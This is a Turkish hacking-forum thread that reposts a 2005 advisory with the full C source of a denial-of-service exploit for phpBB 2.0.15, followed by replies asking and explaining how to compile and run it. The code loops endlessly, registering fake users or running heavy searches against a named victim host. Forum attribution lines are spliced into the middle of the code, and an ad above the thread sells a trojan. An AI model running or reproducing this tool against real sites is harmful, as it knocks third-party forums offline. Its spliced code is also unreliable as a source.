|
|
Php Bb/* -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06 -------------------------------------------------------- Program: phpBB 2.0.15 Homepage: http://www.phpbb.com Vulnerable Versions: phpBB 2.0.15 & Lower versions Risk: High Risk!! Impact: Multiple DoS
Konu TrI-C tarafından açılmış, 608 kişi tarafından görüntülenip, 7 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
Php Bb konusundaki toplam yorum: 7, okunma sayısı: 608. |
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
11-10-2005, 13:21
|
#1 |
|
Forum Ustası
 
Kayıt Tarihi: Mar 2005
Üye numarası: #8520 Yer: İzmir/Bornova(Small Park)
Mesaj sayısı: 3,717
Karma etkisi: 329
  Karma: 31811
|
Php Bb
/*
-------------------------------------------------------- [N]eo [s]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06 -------------------------------------------------------- Program: phpBB 2.0.15 Homepage: http://www.phpbb.com Vulnerable Versions: phpBB 2.0.15 & Lower versions Risk: High Risk!! Impact: Multiple DoS Vulnerabilities. -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==- --------------------------------------------------------- - Description --------------------------------------------------------- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. - Tested --------------------------------------------------------- localhost & many forums - Explotation --------------------------------------------------------- profile.php << By registering as many users as you can. search.php << by searching in a way that the db couln't observe it. - Exploit --------------------------------------------------------- [C Source] /* Name: NsT-phpBBDoS Copyright: NeoSecurityteam Author: HaCkZaTaN Date: 19/06/05 Description: xD You must figure out the problem xD root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS [+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+] NeoSecurityTeam [+] Dos has begun....[+] [*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>[*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com [+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+] NeoSecurityTeam [+] Dos has begun....[+] ................................. root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created" root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE MACHTYPE=i486-slackware-linux-gnu root@NeoSecurity:/home/hackzatan# */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #ifdef WIN32 #include <winsock2.h> #pragma comment(lib, "ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #else #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #endif #define __USE_GNU #define _XOPEN_SOURCE int Connection(char *, int); void Write_In(int , char *, char *a, char *, int); char Use(char *); int main(int argc, char *argv[]) { int sock, x = 0; char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3]; puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN"); puts("[+] NeoSecurityTeam"); puts("[+] Dos has begun....[+]\n"); fflush(stdout); if(argc != 4) Use(argv[0]); while(1) { sock = Connection(Host,80); Write_In(sock, Path, Pro_Sea, Host, x); #ifndef WIN32 shutdown(sock, SHUT_WR); close(sock); #else closesocket(sock); WSACleanup(); #endif Pro_Sea = argv[2]; x++; } //I don't think that it will get here =) return 0; } int Connection(char *Host, int Port) { #ifndef WIN32 #define SOCKET int #else int error; WSADATA wsadata; error = WSAStartup(MAKEWORD(2, 2), &wsadata); if (error == SOCKET_ERROR) { perror("Could Not Start Up Winsock!\n"); return; } #endif SOCKET sockfd; struct sockaddr_in sin; struct in_addr *myaddr; struct hostent *h; if(Port <= 0 || Port > 65535) { puts("[-] Invalid Port Number\n"); fflush(stdout); exit(-1); } if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket() "); fflush (stdout); exit(-1); } if(isalpha(Host[0])) { if((h = gethostbyname(Host)) == NULL) { perror("gethostbyname() "); fflush (stdout); exit(-1); } } else { myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); myaddr->s_addr=inet_addr(Host); if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL) { perror("gethostbyaddr() "); Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=27470 fflush (stdout); exit(-1); } } memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(Port); memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length); if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0) { perror("connect() "); exit (-1); } return sockfd; } void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x) { char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ); char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n" "Accept: */*\r\n" "Accept-Language: en-us\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Accept encoding: gzip,deflate\r\n" "Keep-Alive: 300\r\n" "Proxy-Connection: keep-alive\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Cache-Control: no-cache\r\n" Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=27470 "Pragma: no-cache\r\n"; char *Profile = "%40neosecurityteam.net&new_password=0123456&passw ord_confirm=0123456&icq=&aim=&msn=&yim=&website=&l ocation=&occupation=&interests=&signature=&viewema il=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_p m=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmi lies=1&language=english&style=1&timezone=0&datefor mat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&c oppa=0&submit=Submit\r\n"; char *Search = "&search_terms=any&search_author=*&search_foru m=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&retu rn_chars=200\r\n"; if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile); else if(strcmp("search.php", Pro_Sea) == 0) { Pro_Sea = "search.php?mode=results"; sprintf(str1, "search_keywords=Hack%d%s", x, Search); } else { puts("Sorry. Try making the right choice"); exit(-1); Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=27470 } sprintf(str2, "POST %s%s HTTP/1.1\r\n" "Host: %s\r\n" "Referer: http://%s/\r\n%s" "Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1); write(sock, str2, strlen(str2)); write(1, ".", 1); fflush(stdout); } char Use(char *program) { fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program); fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program); fflush(stdout); exit(-1); } /* @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */ // milw0rm.com [2005-06-22] Alıntıdır |
|
|
|
11-10-2005, 13:40
|
#2 |
|
Banned
Kayıt Tarihi: May 2005
Üye numarası: #16361
Mesaj sayısı: 1,279
Karma etkisi: 0
Karma: 29747
|
Eyyyywallah eline koluna sağlık... FAKAT abijim nasıl kullanılır buuu.... perl olurmu? perl olursa hangi komutları kullanıcaz... tamam cahiliz ama birazda bizi aydınlatsan ne oljek yau
 |
|
|
|
|
11-10-2005, 14:01
|
#3 |
|
Forum Ustası
Kayıt Tarihi: Mar 2005
Üye numarası: #8520 Yer: İzmir/Bornova(Small Park)
Mesaj sayısı: 3,717
Karma etkisi: 329
Karma: 31811
|
dostum kodları ben buldum ama inan nasıl kullanılcağını bilmiyorum bilen varsa lütfen yardımcı olsun
|
|
|
|
|
11-10-2005, 16:52
|
#4 |
|
Forum Kalfası
Kayıt Tarihi: Nov 2004
Üye numarası: #386
Mesaj sayısı: 1,649
Karma etkisi: 713
Karma: 70442
|
perlde kullanılmaz nasıl kullanıldığı bir sürü başlık altında yayınlandı bu açığın olduğu çok az site kaldı ama yine de kullanmak istiyorsan cygwin diye aratıp yazdığım başlığı okuyabilirsin onun dışında bir linux bilgisayar veya shell hesabı lazım
|
|
|
|
|
11-10-2005, 16:52
|
#5 |
|
Banned
Kayıt Tarihi: Jan 2005
Üye numarası: #1179
Mesaj sayısı: 1,062
Karma etkisi: 0
Karma: 10519
|
Arkadaşlar bunlar C exploiti.Hep aynı şeylerden bahsedioz aslında
C exploitini kullanmak için derlemek lazım.Derlemek için Linux lazım yada shell lazım yada cygwin lazım  Eğer bunları edindiyseniz gcc komutuyla derlersiniz.Sonrada çalıştırırsınız.Zaten C de exploit derleme ile ilgili bir çok döküman var nette kolay Gelsin |
|
|
|
|
11-10-2005, 17:39
|
#6 |
|
Forum Ustası
Kayıt Tarihi: Mar 2005
Üye numarası: #8520 Yer: İzmir/Bornova(Small Park)
Mesaj sayısı: 3,717
Karma etkisi: 329
Karma: 31811
|
teşekkürler arkadaşlar
|
|
|
|
|
06-01-2012, 22:52
|
#7 |
|
Banned
Kayıt Tarihi: Jan 2012
Üye numarası: #579042
Mesaj sayısı: 1
Karma etkisi: 0
Karma: 10
|
Test, just a test Marry
Hello. And Bye Marry. IT was nice to see you at this sweet suger house.
|
|
|
|
|
06-01-2012, 22:58
|
#8 | |
|
Co-Admin
 
Kayıt Tarihi: Feb 2005
Üye numarası: #2199 Yer: Kastamonu - 37
Mesaj sayısı: 8,778
Karma etkisi: 375223
Karma: 37520707
|
Alıntı:
go home  |
|
|
|
|
 |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|
